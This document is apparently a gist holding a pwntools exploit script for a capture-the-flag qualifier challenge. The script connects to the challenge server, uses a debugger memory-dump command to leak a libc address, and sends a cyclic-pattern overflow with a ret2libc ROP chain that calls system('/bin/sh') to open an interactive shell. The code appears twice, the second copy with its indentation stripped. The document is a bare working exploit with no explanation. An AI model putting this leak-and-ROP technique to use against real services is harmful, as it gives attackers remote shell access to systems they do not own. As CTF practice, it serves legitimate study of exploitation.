zachriggle/debugger.py Secret

## debugger.py
from pwn import *
context.arch='amd64'
r = remote('int3rupted_3bb8f10793b82841c44a366eb9f27223.quals.shallweplayaga.me', 0xcccc)

@MemLeak
def leak(address):
    r.recvuntil('>')
    r.sendline('db %x' % address)
    for line in r.recvlines(4):
        line = line.replace('-', ' ')
        line = line.strip()
        octets = line.split()[1:]
        return unhex(''.join(octets))

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = leak.q(0x0603040) - libc.symbols['printf']

data = cyclic(cyclic_find('waac')+8)
data += pack(0x0000000000401a13) # : pop rdi ; ret)
data += pack(libc.search('/bin/sh').next())
data += pack(libc.symbols['system'])
r.sendline(data)
r.sendline('c')
r.clean()
r.interactive()
	from pwn import *
	context.arch='amd64'
	r = remote('int3rupted_3bb8f10793b82841c44a366eb9f27223.quals.shallweplayaga.me', 0xcccc)

	@MemLeak
	def leak(address):
	r.recvuntil('>')
	r.sendline('db %x' % address)
	for line in r.recvlines(4):
	line = line.replace('-', ' ')
	line = line.strip()
	octets = line.split()[1:]
	return unhex(''.join(octets))

	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	libc.address = leak.q(0x0603040) - libc.symbols['printf']

	data = cyclic(cyclic_find('waac')+8)
	data += pack(0x0000000000401a13) # : pop rdi ; ret)
	data += pack(libc.search('/bin/sh').next())
	data += pack(libc.symbols['system'])
	r.sendline(data)
	r.sendline('c')
	r.clean()
	r.interactive()